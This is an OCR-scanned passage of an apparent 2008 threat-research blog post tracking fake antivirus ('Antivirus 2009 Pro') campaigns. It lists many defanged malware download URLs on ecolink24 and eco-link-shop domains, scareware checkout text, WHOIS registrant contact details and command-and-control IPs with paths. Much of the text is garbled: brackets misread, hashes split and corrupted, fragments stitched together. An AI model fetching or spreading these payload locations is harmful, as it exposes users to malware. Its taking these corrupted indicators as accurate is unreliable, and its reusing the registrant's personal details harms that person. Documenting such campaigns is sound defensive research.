hxxp://nepropetro[.]Jecolink24[.]ru/goinf _plugin[.Jexe?etag=faa04ce37c47ec47c8892b- 
1c4c3f31d0 

hxxp://nepropetro[.]Jecolink24[.]ru/nethost[.]exe?etag=c555bcbbced 74b5b2a- 
e4aed11230d406 
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hxxp://nerium[.]oneshop[.]getmyip[.]com/topic/1/32 
hxxp://network[.Joneshop[.]getmyip[.]com/review/1/47 


hxxp://ngelina[.Jecolink24[.]ru/goinf _plugin[.]lexe?etag=107b91dd8féd5bffcldc4a- 
87661a4744 
hxxp://ngelina[.Jecolink24[.]ru/goinf _plugin[.Jexe?etag=e02e57eal3d90fda6fOc5f- 
a6924a6b46 


hxxp://ngelina[.Jecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=ef418dd6d92a1f00f18d58d3Ff- 
44e2f19 


hxxp://nglesea[.]ecolinkshopf[. Jru/ 


hxxp://nglishi[.]eco-link-shop[. Jru/2inf _autorun[.]exe?etag=9ae7899da7ccb8efee368- 
db2d7f9fa70 

hxxp://nglishi[.]eco-link-shop[. ]ru/2inf _autorun[.]exe?etag=fafal 7cec792062678e69- 
edb212ae9el1 

hxxp://nglishi[.]eco-link-shop[. ]ru/2inf _favorites[.]exe?etag=9ae7899da7ccb8efee3- 
68db2d7f9fa70 

hxxp://nglishi[.]eco-link-shop[. ]ru/2inf _favorites[.]exe?etag=fafal7cec792062678e- 
69edb212ae9el1 

hxxp://nglishi[.]eco-link-shop[.]ru/2inf _icon[.Jexe?etag=9ae7899da7ccb8efee368db2- 
d7f9fa70 

hxxp://nglishi[.]eco-link-shop[.]ru/2inf _icon[.Jexe?etag=fafal 7cec792062678e69edb- 
212ae9el 

hxxp://nglishi[.]eco-link-shop[. ]ru/2inf _launch[.]exe?etag=9ae7899da7ccb8efee368d- 
b2d7f9fa70 

hxxp://nglishi[.]eco-link-shop[. ]ru/2inf _launch[.]exe?etag=fafal7cec792062678e69e- 
db212ae9el1 

hxxp://nglishi[.]eco-link-shop[. ]ru/2inf _pinnedtabs[.]exe?etag=9ae7899da7ccb8efee- 
368db2d7f9fa70 


hxxp://nglishi[.]eco-link-shop[.]ru/2inf shortcutmaker [.]ico 
hxxp://nglishi[.]eco-link-shop[.]ru/2inf speaddiall[.]png 


hxxp://nglishi[.]eco-link-shop[. ]ru/2inf _speeddiall[.]exe?etag=9ae7899da7ccb8efee3- 
68db2d7f9fa70 

hxxp://nglishi[.]eco-link-shop[. Jru/2inf _Startlink[.]exe?etag=9ae7899da7ccb8efee3- 
68db2d7f9fa70 

hxxp://nglishi[.]eco-link-shop[. Jru/2inf _startlink[.]Jexe?etag=fafal7cec792062678e- 
69edb212ae9el1 

hxxp://nglishi[.]eco-link-shop[. ]ru/2inf _startpage[.]lexe?etag=9ae7899da7ccb8efee3- 
68db2d7f9fa70 

hxxp://nglishi[.]eco-link-shop[. ]ru/2inf _startpage[.Jexe?etag=fafal7cec792062678e- 
69edb212ae9el1 


hxxp://nglishi[.]eco-link-shop[.]ru/go search _desktop[.]exe?etag=9ae7899da7ccb8efee368- 
db2d7f9fa70 


19817 


hxxp://nglishi[.]Jeco-link-shop[.]ru/go _search _desktop[.]exe?etag=fafal 7cec792062678e69- 
edb212ae9el1 


hxxp://nglishi[.]Jeco-link-shop[.]ru/go _search _taskbar[.]Jexe?etag=9ae7899da7ccb8efee368- 
db2d7f9fa70 


hxxp://nglishi[.Jeco-link-shop[.]ru/go _search _taskbar[.Jexe?etag=fafal 7cec792062678e69- 
edb212ae9el 


hxxp://nglishi[.Jeco-link-shop[.]ru/goinf plugin _cis[.]exe?etag=9ae7899da7ccb8efee368db2d- 
7f9fa70 


hxxp://nglishi[.Jeco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=fafal7cec792062678e69edb2- 
12ae9el 


hxxp://nglishi[.]eco-link-shop[.]ru/gosearch3[.]ico 
hxxp://nglishi[.]eco-link-shop[.]ru/nethost[.]exe?etag=9ae7899da7 ccb8efee368db2d7f9fa70 
hxxp://nglishi[.]Jeco-link-shop[.]ru/nethost[.]exe?etag=fafal7cec79 2062678e69edb212ae9el1 


hxxp://nglishi[.]Jeco-link-shop[.]ru/vk audio video _cis[.]exe?etag=9ae7899da7ccb8efee368db2d- 
7f9fa70 


hxxp://nglomanial[.]ecolink24[. ]ru/goinf _plugin[.Jexe?etag=5c00a900cf35f32deddc4b- 
4bb6c6d508 

hxxp://nglomanial[.]ecolink24[. ]ru/goinf _plugin[.Jexe?etag=7f770869716acc4f4ede5a- 
5b478401a5 

hxxp://nglophi[.]ecolink24[.]ru/goinf _plugin[.]exe?etag=0cb17d9588a0938bba1625- 
6e31785840 

hxxp://nglophil[. ]ecolink24[.]ru/goinf _plugin[.Jexe?etag=6d3192d973993b5b2b5adf- 
72fdc8e0e7 

hxxp://nglophi[.]ecolink24[.]ru/goinf _plugin[.lexe?etag=82020db0e980cdc77cbd2b- 
fbe0977c6e 

hxxp://nglophil.]Jecolink24[.]ru/goinf _plugin[.Jexe?etag=f983cf3ef51d45cd638df0- 
bb92296a71 

hxxp://nglopho[.]ecolink24[. ]ru/goinf _plugin[.lexe?etag=86b0d589f92de6f0a10930- 
alc42cd356 

hxxp://nglopho[.]ecolink24[. ]ru/goinf _plugin[.Jexe?etag=c1a23d006c9478f909753e- 
8f898f2791 


hxxp://nglopho[.]ecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=4ba82773b7af1fc0c14286730- 
015f5bc 


hxxp://nglopho[.]ecolink24[.]ru/goinf _plugin _cis[.Jexe?etag=74a1e68395ae6c3f4cb77c880- 
e970d9a 


hxxp://ngooshetial[.Jecolink24[.]ru/2inf _autorun[.]Jexe?etag=43cf984ae5dc770dafe63- 
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hxxp://ngooshetial[. ]ecolink24[.]ru/goinf plugin _cis[.Jexe?etag=25a4ad351c00b3e09e036ffc4- 
722e740 


hxxp://ngooshetial[.]ecolink24[.]ru/goinf plugin _cis[.]Jexe?etag=57d00a8700b5f1707f94a8aea- 
aQae757 


hxxp://ngraulida[.Jecolink24[.]ru/goinf plugin _cis[.Jexe?etag=45fc2d2flaf69c82279654db6- 
7£22ffb 


hxxp://nib[. Jauctions2018[.]dnsalias[.]net/ 


hxxp://nightmare[.]essaypro[.]cloudns[.]cc/sitemap[.]xml 


hxxp://nitialli[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=27e57f0ae108b4f1c3875f- 
5a6cled800 

hxxp://nitialli[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=7a519b22a325607e541240- 
6dfdd57a92 

hxxp://nitialli[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=a2 7ffe10258c468ce6c8c0- 
886c7cf403 


hxxp://nitialli[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=416e893b712423494d5187455- 
11f5730 


hxxp://nitialli[. Jecolink24[.]ru/ 
hxxp://nitialli[. ]Jecolink24[.]ru/goinf _plugin[.]exe?etag=1ffdf9e955b32f24ed240aa26f126ce5 


hxxp://nitialli[.]ecolink24[.]ru/goinf _plugin[.]lexe?etag=84434dd3a2f8db31ee7baf- 
a0ldb9f8a8 


hxxp://nitialli[.]Jecolink24[.]Jru/goinf plugin _cis[.Jexe?etag=46643c2916a9a97b0ddbdfc4e- 
360a101 


hxxp://nitialli[.]Jecolink24[.]Jru/goinf plugin —_cis[.]Jexe?etag=79f05e16806fb340f54ae5b60- 
252222e 


hxxp://nitialli[.]ecolinkshop[. ]ru/goinf _plugin[.]exe?etag=4ff4975beb94abdd6ab/7el- 
1cfdf77c09 

hxxp://nitialli[. ]ecolinkshop[. ]ru/kinoroom _browser[.]exe?etag=4ff4975beb94abdd6ab7e- 
11cfdf77c09 


hxxp://niy[.]astra[.]cloudns[.]cx/ 

hxxp://nju[. smartwritingservice[.]4pu[.]com/article/1/essay/3/ 
hxxp://nju[. ]smartwritingservice[.]4pu[.]com/topic/1/pap er/41/ 
hxxp://nmb[.]smartwritingservice[.]4pu[.]com/article/1/essay/89/ 
hxxp://nmg[.]smartwritingservice[.]4pu[.]com/article/1/paper/72 / 


hxxp://nnabella[.Jeco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=4db597d36109b2fba95982a89- 
bd3delc 


hxxp://nnabella[.]ecolink24[.]ru/goinf _plugin[.]exe?etag=5c724ddc20695f3810764d- 
6cfe90a8ae 
hxxp://nnabella[.]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=Oba22fe0f156b0cc654c17- 
b639222c08 
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hxxp://nnabella[.]Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=3de27ddc7e9a7829133fe83d3- 
83948e5 


hxxp://nnabella[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=b5cd44ddaa9756ddf2cc5defd- 
e26c528 


hxxp://nnelida[.]ecolink24[.]ru/ 


hxxp://nnonacea[.]ecolink24[.]ru/goinf _plugin[.]exe?etag=2799b42649c3e8d75eddeb- 
a06e2dc2cd 


hxxp://nobrychil[.]Jecolink24[.]ru/goinf plugin _cis[.]exe?etag=76ebd4574702d1287f6c4e830- 
ff53b7c 


hxxp://nobrychil[.]ecolinkshop[. ]ru/goinf _plugin[.Jexe?etag=1f8cf1le41068e88df49572- 
65dcd9d868 

hxxp://nog[.]kladtv[.]com/ 

hxxp://nondagal[.]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=1a9ae39ef24d69e09caa70- 
1a9e1d785a 


hxxp://nonviolence[.]shopmarket[. ]from-ca[.]com/ 


hxxp://noplopoma[.]eco-link-shop[.]ru/goinf _plugin[.]Jexe?etag=d29066d4cead1f03975981- 
5bff01b669 


hxxp://noplopomaf[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=9f099463caacc699ea97c2549- 
8079b86 


hxxp://noplopoma[.]Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=4041ddaee05da0904da750844- 
d1la7f69 


hxxp://noplopoma[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=953ad7ad6a385d9fc9605f4ce- 
2e50d5c 


hxxp://nrh[.]goldenshopone[.]from-ca[.]com/ 
hxxp://nrt[.]zend[.]4pu[.]com/ 


hxxp://nstasea[.]ecolink24[.]ru/net _security[.]exe?etag=523328bd111a05385197- 
794f33771721 

hxxp://ntarcti[. ]eco-link-shop[.]ru/goinf _plugin[.]lexe?etag=8f5ff9ele63e47a68c6de5- 
2ac2954457 

hxxp://ntarcti[.]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=e14a67ae980112e0c514a9- 
dd35ec3425 


hxxp://ntarcti[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=0312d67c065193550476f47a/7- 
029b418 


hxxp://ntarcti[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=22d0206ab68335b38c68951b3- 
7e19bb1 


hxxp://ntarcti[. ]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=0facc440275a67465025b4- 
b799768429 
hxxp://ntarcti[. ]ecolinkshop[.]ru/goinf _plugin[.]lexe?etag=38e4d065db9591c8d1a523- 
5cb5678c74 
hxxp://ntarctica[.]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=Ocfe4b4cb488b4f39663ef- 
c8679e7ea6 
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hxxp://ntarctica[.]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=abcO0cf7baa7556400fc987- 
6d724326c1 


hxxp://ntarctica[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=4043d699a45105205138c0- 
d19baaa75e 


hxxp://ntennaria[.]eco-link-shop[.]ru/goinf _plugin[.]Jexe?etag=015ba8c2c42a23b088d525- 
6256d55abl1 


hxxp://ntennaria[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=4d80b5e88366085dd06ba2- 
cl18f6de5ee 


hxxp://ntennaria[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=787d267027da7adf293dbd- 
59934ab50f 


hxxp://ntennaria[.]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=891b65dccbf5f7f62a7 4fd- 
6d31e3b055 


hxxp://ntennaria[.]eco-link-shop[. ]ru/goinf _plugin[.]lexe?etag=b21cc0134e0c2e5ec2c961- 
04d1732d1le 


hxxp://ntennaria[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=1996a0cf63d960cee04 7fbfea- 
dd1f43e 


hxxp://ntennaria[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=2f2f2487f2206f4689c6bb756- 
7b61331a 


hxxp://ntennaria[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=462f95efc9d1e9da8034e90fa- 
437e3ce 


hxxp://ntennaria[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=63a9600b5e0a1d6b76cb5e533- 
a650037 


hxxp://ntennaria[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=b5abc69f5ffedb5d4a79d447f- 
e897591 


hxxp://ntennaria[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=e247290eeb254e008cbdaa053- 
e33d119 


hxxp://ntennaria[.]eco-link-shop[. ]ru/vkmusicdownloader[. ]exe?etag= a- 
7194b6b064236dc7e4469bc5feddde9 

hxxp://ntennaria[.]ecolink24[.]ru/goinf _plugin[.]exe?etag=1da7ce71002390011db6ec- 
f40b507591 

hxxp://ntennaria[.]ecolinkshop[.]ru/goinf _plugin[.lexe?etag=192b87e87741b94a3c949F- 
f2fle27b5e 

hxxp://ntennaria[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=586a9f7b268d455a236e0b- 
c9e8e39c0F 

hxxp://ntennaria[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=7d6083fdce6439e6200dd4- 
822d84ad66 

hxxp://ntennaria[.]ecolinkshop[.]ru/goinf _plugin[.lexe?etag=a23f7d5e7f2845ce228648- 
7df15c8f5d 

hxxp://ntennaria[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=cal7e996380e030ebb5ffc- 
065855ba84 


hxxp://ntennaria[.]ecolinkshop[.]ru/goinf_ plugin _cis[.Jexe?etag=39b341d5d805e0e8efe902860- 
7f88ad7 
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hxxp://ntennaria[.Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=43d9b10f093908c95f2522bc2- 
fd2bfea 


hxxp://ntennaria[.Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=6b0a0bed79b75f7522b64e86f- 
d6031bb 


hxxp://ntennaria[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=7dab2f9900c2750218a4b3eb6- 
2e95aae 


hxxp://ntennaria[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=a3ddccb94d18753621cc78216- 
72a25a5 


hxxp://ntennaria[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=ad2c93567193daa4632dbf22a- 
a60e520 


hxxp://ntennaria[.Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=b2605acf4b55a3f29a825f88c- 
4123d26 


hxxp://ntennaria[.]ecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=c5c5d10d6828742a024136246- 
d6af6b8 


hxxp://ntennaria[.Jecolinkshop[.]ru/goinf plugin _cis[.]Jexe?etag=eae4af91a834a245fc98425a6- 
3f35159 


hxxp://ntennaria[.]ecolinkshop[.]ru/net _security[.lexe? 


hxxp://ntennaria[.]ecolinkshop[.]ru/nethost[.]exe?etag=497c659714 8- 
2b9efcbd4af9c76403b58 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf _plugin[.]lexe?etag=0143df92150da55a0d9568- 
73a962bc75 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf _plugin[.]lexe?etag=03e75f95ebd6bbb39eec6a- 
e5a0e55f8f 


hxxp://nternatio[. ]eco-link-shop[.]ru/goinf _plugin[.]exe?etag=41785b79ebee/2c74b3238- 
141c33f97a 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf _plugin[.]lexe?etag=4afb26278ce7e472cd68b6- 
d442083c23 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf _plugin[.]lexe?etag=78c8b6f23359daa0da3566- 
b0c676a0a3 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf _plugin[.]lexe?etag=831c341feacb92effca073- 
deda0dec4e 
hxxp://nternatio[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=9d3a3150eaa7ce8fdb7 2ff- 
823ec9bc25 


hxxp://nternatio[.]Jeco-link-shop[.]Jru/goinf _plugin[.Jexe?etag=aa5b329704006175747edd- 
3407bc595d 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf _plugin[.]lexe?etag=c29c59f2elefec4c6790bc- 
a4c974c247 
hxxp://nternatio[.]eco-link-shop[.]ru/goinf _plugin[.Jexe?etag=e9f936c6e49a5f6de92948- 
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antivirus-pc-scan .com (208.72.169.100) 

securityfullscan .com (84.243.197.184) 

antivirus-live-scan .com (84.243.196.136; 89.149.227.196) 
windefender-2009 .com - (200.63.45.55) 

windefender2009 .com 


“} Antivirus 2009 


Professional License for Antivirus 2009 Pro 


fully Secure & Encrypted Ordering cas Your Imad Addrevs and Pervonal Information arc 
Even Sater Than Over the Phone Sa Prreatec and MEVER resobd 


ORDER SUMMARY 


$49.95 


Antivirus 2009 Pro Software License (Lrreceed to Ohechowt_@) 
(single user icense, ONE year of updates) 

$79.95 

Antivirus 2009 Pro Software License A 
(single user bcense, THREE years of updates) 50% OFFI 


Instant Access, Discreet Biting. Secure Procedure 
by convensently using cur Online 
Credit Card Option. 


6 good reasons to buy now: 


© 24/7 qualiéed customer support service 

© Progressive technology m action 

e@ Customer satrstacton and money back guarartee 
© Free XP antiveus Membership 

© User frendty mterface 


SAFETY SECURITY 


What these domains have in common, excluding the last two WinDefender ones, is the domain 
registrant, the DNS servers used, and that despite the fact that it has already been featured in 
several malicious doorways, meaning these are receiving traffic already, they forgot to upload 
the binaries on all of the active domains : 


"Not Found. The requested URL /2009/download/trial/AQinstaller _.exe was not found on 
this server." 


Registrant: 
Vladimir Polilov 


1985 
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hxxp://nternatio[.]eco-link-shop[.]ru/goinf_ plugin _cis[.]Jexe?etag=6beb9a35ffbf962389cb503ee- 
f49362a 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=809853c5fef7 7fe766b0d8118- 
77d3e48 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf_plugin _cis[.]Jexe?etag=b19aa4e0e46751e7a32b85458- 
1c0369c 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf_ plugin _cis[.]Jexe?etag=bd5187908481e74699f99256e- 
5957a5f 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=cefld5 7a6e9bdf6df31bfbd5b- 
ef4b76a 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=dfc816646779643ba87903627- 
16a3bc5 


hxxp://nternatio[.]eco-link-shop[.]ru/goinf plugin _cis[.]Jexe?etag=f3860c0f4f241d8885feb9d5b- 
0e98cab6 


hxxp://nternatio[.]eco-link-shop[.]ru/kinoroom _browser[.]exe?etag=4911e678beb3148890f9F- 
49a0429711b 


hxxp://nternatio[.]eco-link-shop[.]ru/kinoroom _browser[.]exe?etag=78c8b6f23359daa0da356- 
6b0c676a0a3 


hxxp://nternatio[.]eco-link-shop[.]ru/kinoroom _browser[.]exe?etag=d6bb2ba9dfcb1778cabbb- 
3b20583a170 


hxxp://nternatio[.]eco-link-shop[. ]ru/vkmusicdownloader[. ]exe?etag= 0- 
e31d5200bbd0feaelfd3f42c3c25025 

hxxp://nternatio[.]eco-link-shop[. ]ru/vkmusicdownloader[.]exe?eta g=4- 
afb26278ce7e472cd68b6d442083c23 

hxxp://nternatio[.]eco-link-shop[. ]ru/vkmusicdownloader[.]exe?eta g=8- 
9fae845c2136ea7249d6929a8d3a68d 

hxxp://nternatio[.]eco-link-shop[. ]ru/vkmusicdownloader[.]exe?eta g=8- 
ccce21c095e8d7032123b43eeb1b737 

hxxp://nternatio[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=4bel12faaae04c7be99a666- 
176bd9717c 

hxxp://nternatio[.]ecolinkshop[.]ru/goinf _plugin[.]lexe?etag=65e9dfb7d51a5ecdccc265- 
7ce9757c63 

hxxp://nternatio[.]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=9eb8110d986fd118a4c18c- 
c7552badle 

hxxp://nternatio[.]ecolinkshop[.]ru/goinf _plugin[.]exe?etag=a9aal18100014648f2ed80f- 
1f2779cb37 

hxxp://nternatio[.]ecolinkshop[.]ru/goinf _plugin[.Jexe?etag=c1b4b0b6d65e31b4290fc3- 
153b7e035a 

hxxp://nternatio[.]ecolinkshop[.]ru/goinf _plugin[.]lexe?etag=c27fb88867143925f6bc30- 
08c8d70220 
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hxxp://nternatio[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=1dc851c2023871171ac8334d2- 
0d7012d 


hxxp://nternatio[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=6b69c5caed236150d142d7027- 
4431e03 


hxxp://nternatio[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=8bb9dcd98abb2135ccfd8f767- 
25a2eb7 


hxxp://nternatio[.]ecolinkshop[.]ru/goinf plugin _cis[.Jexe?etag=ae5bc8beb28ee5a96735dbb70- 
637e008 

hxxp://nternatio[.]ecolinkshop[.]ru/kinoroom _browser[.Jexe?etag=c27fb88867143925f6bc3- 
008c8d70220 

hxxp://nternatio[.]Jecolinkshop[.]ru/kinoroom _browser[.]exe?etag=flf4dbbbdfd91130f2587- 
8b79db4150c 

hxxp://nternatio[. ]ecolinkshop[.]ru/nethost[.]exe?etag=flclce8f77 b2be08- 
09a114a26fb5c98a 


hxxp://nthracoterida[.]eco-link-shop[.]ru/goinf plugin _cis[.Jexe?etag=884974012f90a40b113c2d52d- 
eaceOac 


hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _autorun[.]exe?etag=01459b9577fcccf362087- 
6455e0710dc 

hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _autorun[.]exe?etag=aa4d180cca2da93e2a7f6- 
74b8bea1754 

hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _favorites[.]exe?etag=01459b957 7fcccf3620- 
876455e0710dc 

hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _favorites[.]exe?etag=aa4d180cca2da93e2a7- 
f674b8bea1754 

hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _icon[.Jexe?etag=01459b957 7fcccf362087645- 
5e0710dc 

hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _icon[.Jexe?etag=aa4d180cca2da93e2a7f674b- 
8beal754 

hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _launch[.Jexe?etag=01459b9577fcccf3620876- 
455e0710dc 

hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _launch[.]exe?etag=aa4d180cca2da93e2a7f67- 
4b8beal754 

hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _pinnedtabs[.]lexe?etag=aa4d180cca2da93e2a- 
7f674b8bea1754 


hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf shortcutmaker [.]ico 
hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf speaddiall.]png 


hxxp://ntilocapra[.]eco-link-shop[. ]ru/2inf _speeddial[.]exe?etag=aa4d180cca2da93e2a/7- 
f674b8bea1754 
hxxp://ntilocapra[.]eco-link-shop[.]ru/2inf _startpage[.]exe?etag=01459b957 7fcccf3620- 
876455e0710dc 
hxxp://ntilocapra[.]eco-link-shop[. ]ru/2inf _startpage[.]exe?etag=aa4d180cca2da93e2a/7- 
f674b8bea1754 
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hxxp://ntilocapra[.]Jeco-link-shop[.]ru/etranslator[.]exe?etag=aa4d1 80- 
cca2da93e2a7f674b8beal754 


hxxp://ntilocapra[.]eco-link-shop[.]ru/go_ search _desktop[.]lexe?etag=01459b957 7fcccf362087- 
6455e0710dc 


hxxp://ntilocapra[.]eco-link-shop[.]ru/go_ search _desktop[.]lexe?etag=aa4d180cca2da93e2a7f6- 
74b8beal1754 


hxxp://ntilocapra[.]eco-link-shop[.]ru/go_ search _taskbar[.]exe?etag=01459b957 7fcccf362087- 
6455e0710dc 
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Email: godomains@yahoo.com 
Organization: Private person 
Address: ul. Bauma 13-76 
City: Moskva 

State: Moskovskaya oblast 
ZIP: 112621 

Country: RU 

Phone: +7.9031609536 
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hxxp://rzrs[.]org/nome/link[.]php?url=hxxp://gch[.]goldenshopon e[.]from-ca[.]com/ 

hxxp://rzz[.]Jgoldenshopone[. ]from-ca[.]com/ 

hxxp://s3crt[. ]biz/ 

hxxp://sag[.]smartwritingservice[.]4pu[.]com/free-essays/1/paper/ 80/ 

hxxp://salem80[. Jinfo/123/ 

hxxp://salem80[. linfo/206 

hxxp://salem80[.]Jinfo/206/ 

hxxp://salem80[. linfo/209 

hxxp://salem80[. Jinfo/212 

hxxp://salem80[. Jinfo/212/ 

hxxp://salem80[.]info/215 

hxxp://salem80[. ]info/229 

hxxp://salem80[. linfo/333 

hxxp://salem80[. linfo/339 

hxxp://salem80[. linfo/wp-admin 

hxxp://salem80[. linfo/wp-content/plugins/ad-inserter/includes/js 

hxxp://salem80[. Jinfo/wp-content/plugins/cfmonitor/js 

hxxp://salem80[. Jinfo/wp-content/plugins/contact-form-7/includes/css 

hxxp://salem80[. linfo/wp-content/plugins/contact-form-7/includes/js 
19851 


hxxp://salem80[.]info/wp-content/plugins/td-composer/td-multi-purpose 
hxxp://salem80[.]info/wp-content/plugins/thrive-visual-editor/editor/css 
hxxp://salem80[.]info/wp-content/plugins/thrive-visual-editor/editor/js/d ist 
hxxp://salem80[.]info/wp-content/plugins/thrive-visual-editor/thrive-dash board/js/dist 
hxxp://salem80[.]info/wp-content/themes/Newspaper/images/icons 
hxxp://salem80[.]info/wp-content/themes/Newspaper/includes/demos/ cafe 
hxxp://salem80[.]info/wp-content/themes/Newspaper/js 
hxxp://salem80[.]info/wp-content/themes/twentynineteen 
hxxp://salem80[.]info/wp-content/themes/twentynineteen/header[.]p hp 
hxxp://salem80[.]info/wp-content/uploads/2019/08 
hxxp://salem80[.]info/wp-content/uploads/2019/11 
hxxp://salem80[.]info/wp-content/uploads/2019/12 
hxxp://salem80[.]info/wp-includes/css/dist/block-library 
hxxp://salem80[.]info/wp-includes/js 


hxxp://sao[.]mos[.]ru/bitrix/rk[.]php?goto=hxxp://akq[.]mamas hoping[.]- 
cloudns[.]cx/sitemap[. ]txt 


hxxp://schorfheide-joachimsthal[.]de/php/out[.]php?url=hxxp ://tbd[.]kladtv[.]com/ 


hxxp://scj[.]smartwritingservice[.]4pu[.]com/topic/2017821/w hich-of-these-storylines-can-be- 
categorized-as-science-fiction/ 


hxxp://selffarma[.]com/ 
hxxp://selfpharmal[.]com/ 
hxxp://selfpharmal[.]pl/ 
hxxp://sfq[.]goldenshopone[.]from-ca[.]com/ 
hxxp://sgu[.]goldenshopone[.]from-ca[.]com/ 


hxxp://shopfblikes[.]com/wp-content/plugins/phpl/redirect[.]php?url= - 
hxxp://afe[. ]mamashoping[.]cloudns[.]cx/sitemap[. ]txt 


hxxp://shoreham-by-sea[.]west-sussex-towns[.]co[.]uk/link[.Jasp ?url=hxxp://ai- 
jl. ]Jmamashoping[.]cloudns[.]cx 


hxxp://shou-gakkou[.]net/rank[.]php?mode=link &id=724 &url=hxxp://qzn[.]kladtv[.]com/ 
hxxp://shrtnr[.]de/intelinsidecorei5 796386 
hxxp://shz[.]smartwritingservice[.]4pul[.]com/essay/1/essay/7/ 

hxxp://signin[. ]ebey[.]co[.]uk-msg[.]pro/ 
hxxp://silversmiths[.]oneshop[.]getmyip[.]com/topic/1/9 
hxxp://site4u[.]kz/go[.]php?go=hxxp://zxg[.]uoancorp[.]li fe/ 
hxxp://slamabal[.]eco-link-shop[. ]ru/ 

hxxp://slamabal[.]Jeco-link-shop[.]ru/2inf _autorun[.]exe 
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Mirniy,MSK,RU 102422 


The sampled WinDefender binaries phone back to megauplinkbindinstaller .com/cfg1.php 
(91.203.92.99) with the entire netblock clearly a bad neighborhood. Here are some sample 
command and control locations : 


91.203.92.101 /admin/cd.php?userid=19102008 184429 260953 
91.203.92.25 /dmn/domen.txt 

91.203.92.135 /alligator/cfg.bin 

91.203.92.132 /c.bin 


This operation is being monitored, results will be posted as they emerge. 


Related posts: 

[1]A Diverse Portfolio of Fake Security Software - Part Eleven 
[2]A Diverse Portfolio of Fake Security Software - Part Ten 
[3]A Diverse Portfolio of Fake Security Software - Part Nine 
[4]A Diverse Portfolio of Fake Security Software - Part Eight 
[5]A Diverse Portfolio of Fake Security Software - Part Seven 
[6]A Diverse Portfolio of Fake Security Software - Part Six 
[7]A Diverse Portfolio of Fake Security Software - Part Five 
[8]A Diverse Portfolio of Fake Security Software - Part Four 
[9]A Diverse Portfolio of Fake Security Software - Part Three 
[10]A Diverse Portfolio of Fake Security Software - Part Two 
[11]Diverse Portfolio of Fake Security Software 


1. http: //ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_28.htm 
ttp://ddanchev. blogspot .com/2008/10/diverse-portfolio-of-fake-security_22.htm 


ttp://ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security_20.htm 


10. http: //ddanchev. blogspot .com/2008/08/diverse-portfolio-of-fake-security.htm 
11. http: //ddanchev.blogspot.com/2007/12/diverse-portfolio-of-fake-security.htm 


4.11.3 Summarizing Zero Day’s Posts for October (2008-11-04 16:10) 


1988 


